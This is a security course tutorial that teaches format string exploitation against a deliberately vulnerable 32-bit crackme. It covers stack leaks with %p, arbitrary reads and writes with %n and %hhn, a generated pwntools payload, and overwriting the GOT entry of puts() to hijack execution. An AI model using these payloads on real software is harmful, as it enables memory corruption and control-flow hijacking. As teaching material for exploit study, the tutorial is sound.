In this tutorial, we'll explore a powerful new class of bug, called a "format string vulnerability". Though it looks benign at first, this type of bug allows for arbitrary reads and writes in memory, and thus, arbitrary code execution.
We've finally eliminated the buffer overflow vulnerability in the crackme0x00 binary. Let's check out the new implementation!
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <err.h> #include "flag.h" unsigned int secret = 0xdeadbeef; void handle_failure(char *buf) { char msg[100]; snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf); printf(msg); } int main(int argc, char *argv[]) { setreuid(geteuid(), geteuid()); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stdin, NULL, _IONBF, 0); int tmp = secret; char buf[100]; printf("IOLI Crackme Level 0x00\n"); printf("Password:"); fgets(buf, sizeof(buf), stdin); if (!strcmp(buf, "250382\n")) { printf("Password OK :)\n"); } else { handle_failure(buf); } if (tmp != secret) { puts("The secret is modified!\n"); } return 0; }
$ checksec --file crackme0x00 [*] '/home/lab05/tut05-fmtstr/crackme0x00' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000)
As you can see, it's a fully protected binary.
NOTE. These two lines immediately flush your input and output buffers. They're just there to make your life easier. setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stdin, NULL, _IONBF, 0);
NOTE. These two lines immediately flush your input and output buffers. They're just there to make your life easier.
setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stdin, NULL, _IONBF, 0);
It works similarly to before, but when we type an incorrect password, it now produces an error message like this:
$ ./crackme0x00 IOLI Crackme Level 0x00 Password:asdf Invalid Password! asdf
Unfortunately, this program is using printf() in a very insecure way.
printf()
snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf); printf(msg);
Notice that after the first line above, msg will contain your input (the invalid password). If that input happens to contain a format specifier (%), the printf() in the second line will interpret it. This creates a security issue.
msg
%
Some common format specifiers are:
%p
%s
%d
%x
Let's try typing %p:
$ ./crackme0x00 IOLI Crackme Level 0x00 Password:%p Invalid Password! 0x64
What's 0x64 in base-10? What do you think this represents in the code?
0x64
Let's go crazy by putting more %ps. How about 15?
$ echo "1=%p|2=%p|3=%p|4=%p|5=%p|6=%p|7=%p|8=%p|9=%p|10=%p|11=%p|12=%p|13=%p|14=%p|15=%p" | ./crackme0x00 Password:Invalid Password! 1=0x64|2=0x8048a40|3=0xffe1f428 ...
We seem to be able to see the values for 15 (or more -- we chose 15 arbitrarily) nonexistent arguments to the printf() call.
1=0x64 2=0x8048a40 3=0xffe1f428 4=0xf7f3ce89 ... 10=0x61766e49 11=0x2064696c 12=0x73736150 13=0x64726f77 14=0x3d312021 15=0x327c7025
Where are those values coming from?
By the way, it's rather tedious to put lots of %ps to see these values. Luckily, printf-like functions provide a convenient way to access the n'th argument: %[nth]$p (e.g., %1$p = first argument). Let's try it:
printf
%[nth]$p
%1$p
$ echo '%10$p' | ./crackme0x00 IOLI Crackme Level 0x00 Password:Invalid Password! 0x61766e49
As expected, the value printed matches the tenth one listed above.
NOTE: Be sure to use single quotes (') rather than double quotes ("), to prevent your shell from trying to interpret the $ itself (e.g., like $PATH). If you do later need a format-string argument that includes interpolation, use " and backslash-escape the format-specifier $s (i.e., "\$").
'
"
$
$PATH
\$
Let's exploit this format-string bug to write an arbitrary value to an arbitrary memory address.
Have you noticed these interesting values in the output earlier?
4=0xf7f3ce89 ... 10=0x61766e49 'Inva' 11=0x2064696c 'lid ' 12=0x73736150 'Pass' 13=0x64726f77 'word' 14=0x3d312021 '! 1=' 15=0x327c7025 '%p|2'
We can actually see our input string itself. We know that that string is stored on the stack, so it seems that what we put onto the stack is actually being interpreted as additional printf() arguments. What's going on?
When you invoke a printf()-like function, your arguments are passed via the stack, like this:
printf("%s", a1, a2); [ ra ] [ s ] --+ < 1st printf() argument: pointer to the format string [ a1 ] | < 2nd printf() argument: a1, the 1st format-string argument (aka %1$s) [ a2 ] | < 3rd printf() argument: a2, the 2nd format-string argument (aka %2$s) ["%s"] <-+ < the actual string data itself, on the stack [ ...]
Only three arguments are passed to printf() here, but printf() itself has no way of knowing that. So if the format string calls for higher-numbered arguments, printf() will faithfully read more data from the stack, since that's where those arguments would be if they did exist.
In this simple case, the third "argument" (i.e. %3$s) happens to be the format string data itself, so we have full control over its value! You can take advantage of this to read a few bytes from an arbitrary memory address, like this:
%3$s
printf("\xaa\xaa\xaa\xaa%3$s", a1, a2); [ ra ] [ s ] --+ [ a1 ] | [ a2 ] | +-- [aaaa] <-+ | [ ...] | V ?
This reads and prints a string (%s) at an address indicated by "the third argument," which we've set up to contain address 0xaaaaaaaa. By modifying the value of that address, we can make printf() read a string from anywhere.
In the case of the actual target binary, where is your input string located on the stack? That is, what value of N below results in this output?:
target
N
$ echo 'BBAAAA%N$p' | ./crackme0x00 IOLI Crackme Level 0x00 Password:Invalid Password! BBAAAA0x41414141
What happens if we then replace %p with %s? How does it crash?
You can examine the stack to understand how the format string bug works. As you can see, there are pointers to your input string AABBBB in the 3rd and 7th entries of the stack, and a copy of the value BBBB itself exists in the 15th entry.
AABBBB
BBBB
pwndbg> x/100i handle_failure 0x804880b <handle_failure>: push ebp 0x804880c <handle_failure+1>: mov ebp,esp 0x804880e <handle_failure+3>: sub esp,0x88 ... 0x8048841 <handle_failure+54>: push eax 0x8048842 <handle_failure+55>: call 0x8048520 <printf@plt> pwndbg> b *0x8048842 Breakpoint 1 at 0x8048842: file crackme0x00.c, line 14. pwndbg> r Starting program: /home/lab05/tut05-fmtstr/crackme0x00 AAAABBBBCCCC IOLI Crackme Level 0x00 Password:AABBBB pwndbg> stack 30 00:0000| esp 0xffd86b50 -> 0xffd86b78 <- 0x61766e49 ('Inva') 01:0004| 0xffd86b54 <- 0x64 /* 'd' */ 02:0008| 0xffd86b58 -> 0x8048a40 <- dec ecx 03:000c| 0xffd86b5c -> 0xffd86c18 <- 'AABBBB\n' 04:0010| 0xffd86b60 -> 0xf7f0eeb9 05:0014| 0xffd86b64 <- 0x1 06:0018| 0xffd86b68 <- 0x0 07:001c| 0xffd86b6c -> 0xffd86c18 <- 'AABBBB\n' 08:0020| 0xffd86b70 -> 0x804a00c (_GLOBAL_OFFSET_TABLE_+12) 09:0024| 0xffd86b74 -> 0xf7f14028 (_dl_fixup+184) 0a:0028| eax 0xffd86b78 <- 0x61766e49 ('Inva') 0b:002c| 0xffd86b7c <- 0x2064696c ('lid ') 0c:0030| 0xffd86b80 <- 0x73736150 ('Pass') 0d:0034| 0xffd86b84 <- 'word! AABBBB\n\n' 0e:0038| 0xffd86b88 <- '! AABBBB\n\n' => 0f:003c| 0xffd86b8c <- 'BBBB\n\n'
You can check this yourself, too. If you try to print the 3rd or 7th argument as a string, it inserts a copy of your input:
lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00 IOLI Crackme Level 0x00 Password:AABBBB%3$s Invalid Password! AABBBBAABBBB%3$s lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00 IOLI Crackme Level 0x00 Password:AABBBB%7$s Invalid Password! AABBBBAABBBB%7$s
But attempting to dereference the 15th stack entry causes a segmentation fault because that value is not a pointer, but rather the raw string "BBBB":
lab05@cs6265:~/tut05-fmtstr$ ./crackme0x00 IOLI Crackme Level 0x00 Password:AABBBB%15$s Segmentation fault (core dumped)
What happens if you replace the "BBBB" with a valid address and try that again?
[Task] How can you use this to read the global variable "secret"? You can find the address of secret using nm (or GDB or Ghidra): $ nm crackme0x00 | grep secret 0804a050 D secret
[Task] How can you use this to read the global variable "secret"?
secret
You can find the address of secret using nm (or GDB or Ghidra):
nm
$ nm crackme0x00 | grep secret 0804a050 D secret
printf() is very complex, and actually even supports a sort of "write" operation: it can write the total number of bytes printed so far to a specified location.
%n
int len; printf("aaaa%nbbbb", &len); // `len` now contains 4, because 4 bytes had been printed so far at that point
Using this, and a similar trick to the arbitrary read, you can write to an arbitrary memory location like this:
printf("\xaa\xaa\xaa\xaa%3$n", a1, a2); [ ra ] [ s ] --+ [ a1 ] | [ a2 ] | +-- [aaaa] <-+ | [ ...] | V ... *0xaaaaaaaa = 4 (i.e., 4 "\xaa"s have been printed so far)
With this idea, we clearly have full control over the address, but so far it seems we can only write the number "4" there. How can we write an arbitrary value?
To do that, we need to use another useful printf() format specifier: %[len]d (e.g., %10d). This prints an integer (we don't care which one) using at minimum len characters. This can be used to quickly raise the value that %n will write, without requiring an excessively long format string.
%[len]d
%10d
len
For example, to write 10 to 0xaaaaaaaa, you can print 6 more characters, like this:
0xaaaaaaaa
printf("\xaa\xaa\xaa\xaa%6d%3$n", a1, a2); ^^^ *0xaaaaaaaa = 10;
And now you can write an arbitrary value to an arbitrary location. Almost.
Let's suppose you want to write the value 0xc0ffee to 0xaaaaaaaa. We'd prefer to avoid having to generate 12648430 bytes of output, so it'd be better to write this value byte-by-byte instead, which would involve far smaller numbers. You might think to do that with these operations:
0xc0ffee
*(int *)0xaaaaaaaa = 0x000000ee; *(int *)0xaaaaaaab = 0x000000ff; *(int *)0xaaaaaaac = 0x000000c0;
But the problem is that once characters have been printed, they can't be "un-printed", so the values that we write must strictly increase over time. So the writes would need to be done in this order:
*(int *)0xaaaaaaac = 0x000000c0; *(int *)0xaaaaaaaa = 0x000000ee; *(int *)0xaaaaaaab = 0x000000ff;
But when you write the 4-byte integer 0x000000ee to 0xaaaaaaaa, you overwrite the byte 0xc0 at 0xaaaaaaac with a null byte. So that won't work.
0x000000ee
0xc0
0xaaaaaaac
There is a solution! There exist smaller-sized versions of %n:
%hn
%hhn
That is, you can do this:
printf("\xaa\xaa\xaa\xaa%6d%3$hhn", a1, a2); *(unsigned char*)0xaaaaaaaa = 10;
This solves two problems at the same time:
0xff
0xc1
0x1c0
*(unsigned char*)0xaaaaaaaa = 0xee; *(unsigned char*)0xaaaaaaab = 0xff; *(unsigned char*)0xaaaaaaac = 0xc0; // lowest 8 bits of 0x1c0
[Task] Can you overwrite the secret value with 0xc0ffee?
It's important to understand the core idea of how to construct a format string that writes an arbitrary value to an arbitrary location, but when you try to actually implement one, you'll quickly find that it's very tedious to do manually. Fortunately, pwntools provides a format string exploit generator for you.
fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') offset (int): the first formatter's offset you control writes (dict): dict with addr, value {addr: value, addr2: value2} numbwritten (int): the number of bytes already written by printf()
fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
int
dict
{addr: value, addr2: value2}
Let's say we'd like to write 0xc0ffee to *0xaaaaaaaa, and we have control of the format string at the 4th param (i.e., %4$p), but we've already printed out 10 characters.
*0xaaaaaaaa
%4$p
$ python3 -c 'from pwn import*; print(fmtstr_payload(4, {0xaaaaaaaa: 0xc0ffee}, 10))' %228c%13$n%17c%14$hhn%193c%15$hhnaaa\xaa\xaa\xaa\xaa\xab\xaa\xaa\xaa\xac\xaa\xaa\xaa
[Task] Is this similar to what you've come up with to write 0xc0ffee to the secret value? Please modify template.py to overwrite the secret value (if you succeed, the binary will print "The secret is modified!")!
The secret is modified!
Your task for today is to launch a control-hijacking attack using this format string vulnerability. The plan is simple: overwrite the GOT of puts() with the address of print_key(), so that when puts() is invoked, execution is actually redirected to print_key().
puts()
print_key()
Here's an explanation of the GOT in case you haven't heard of it. The Global Offset Table ("GOT" for short) is a table in the process's memory which contains pointers to external functions (e.g., puts() or printf() in libc). Each entry corresponds to one function the compiler expects the binary to use.
When a dynamic loader such as ld initially loads the program, the GOT is (roughly speaking -- the actual behavior will be demonstrated shortly) filled with pointers to "_dl_runtime_resolve()":
ld
_dl_runtime_resolve()
[&_dl_runtime_resolve] <- entry for printf() [&_dl_runtime_resolve] <- entry for puts() [&_dl_runtime_resolve] <- entry for scanf() [&_dl_runtime_resolve] <- entry for exit() ...
The first time the process attempts to call an external function through this table, _dl_runtime_resolve() is invoked. It obtains the real address of the desired function (i.e., the real address of puts() in libc), updates the table, and calls the function.
[&_dl_runtime_resolve] <- entry for printf() [&puts] <- entry for puts() [&_dl_runtime_resolve] <- entry for scanf() [&_dl_runtime_resolve] <- entry for exit() ...
After that, any further calls to the same external function (e.g., puts()) will therefore be immediately directed to the real address.
Let's see this in action. Here's the code snippet in main() that calls puts("The secret is modified!\n"):
main()
puts("The secret is modified!\n")
0x0804891b <+189>: sub esp,0xc 0x0804891e <+192>: push 0x8048a80 0x08048923 <+197>: call 0x8048590 <puts@plt>
Note that "puts@plt" is not the real "puts()" in libc -- 0x80490a0 is in your code section (try vmmap 0x80490a0). The real puts() from libc is located here:
puts@plt
0x80490a0
vmmap 0x80490a0
> x/4i puts 0xf7db7b40 <puts>: push ebp 0xf7db7b41 <puts+1>: mov ebp,esp 0xf7db7b43 <puts+3>: push edi 0xf7db7b44 <puts+4>: push esi
puts@plt means "puts at the Procedure Linkage Table (PLT)"; it points to one of the entries in the PLT:
puts
> pdisas 0x8048590-0x20 > 0x8048570 <err@plt> jmp dword ptr [err@got.plt] <0x804a024> 0x8048576 <err@plt+6> push 0x30 0x804857b <err@plt+11> jmp 0x8048500 <0x8048500> 0x8048580 <fread@plt> jmp dword ptr [fread@got.plt] <0x804a028> 0x8048586 <fread@plt+6> push 0x38 0x804858b <fread@plt+11> jmp 0x8048500 <0x8048500> 0x8048590 <puts@plt> jmp dword ptr [puts@got.plt] <0x804a02c> 0x8048596 <puts@plt+6> push 0x40 0x804859b <puts@plt+11> jmp 0x8048500 <0x8048500> ...
As you can see, the PLT is a table containing (among other things) stub functions that each just jump to an address read from the GOT. puts@got.plt (0x804a02c) is the actual GOT entry for puts(), where the address is stored.
puts@got.plt
0x804a02c
Let's follow this call (i.e., single-stepping into the call with stepi):
stepi
> 0x8048590 <puts@plt> jmp dword ptr [puts@got.plt] <0x804a02c> 0x8048596 <puts@plt+6> push 0x40 0x804859b <puts@plt+11> jmp 0x8048500 <0x8048500> v 0x8048500 push dword ptr [_GLOBAL_OFFSET_TABLE_+4] <0x804a004> 0x8048506 jmp dword ptr [0x804a008] <_dl_runtime_resolve> v 0xf7fb8dd0 <_dl_runtime_resolve> push eax 0xf7fafe11 <_dl_runtime_resolve+1> push ecx 0xf7fafe12 <_dl_runtime_resolve+2> push edx
The GOT entry for puts() (puts@got.plt) initially points to puts@plt+6, which is the next instruction after puts@plt. This ends up invoking _dl_runtime_resolve() with two parameters: a pointer to the start of the GOT itself (_GLOBAL_OFFSET_TABLE_+4), and a value indicating which function should be resolved (0x40, meaning puts()). Once _dl_runtime_resolve() is done, puts@got.plt will point to the real puts() in libc (0xf7e11b40 in this case).
puts@plt+6
_GLOBAL_OFFSET_TABLE_+4
0xf7e11b40
Your goal is to use a format string to overwrite the GOT entry of puts() with another function's address, so that execution will be hijacked when puts() is called.
There are two challenges you'll encounter when doing this:
In order to reach the only call to puts() that occurs after your format string is parsed, you must also overwrite the secret value:
if (tmp != secret) { puts("The secret is modified!\n"); }
[Task] What should the "writes" param for fmtstr_payload() be?
fmtstr_payload()
Unfortunately, the size of the buffer is very limited, meaning it might not be able to fit the format strings for both write targets.
void handle_failure(char *buf) { char msg[100]; ... }
Do you remember the %hn/%hhn trick that lets you overwrite fewer bytes at a time, like one or two? That's where write_size comes into play:
write_size
fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') write_size (str): must be byte, short or int. Tells if you want to write byte by byte, short by short or int by int (hhn, hn or n)
str
byte
short
Finally! Can you hijack the puts() invocation to redirect it to print_key() to get your flag for this tutorial?
[Task] In the given template.py, modify the payload to redirect the puts() invocation to print_key(), and get your flag!
template.py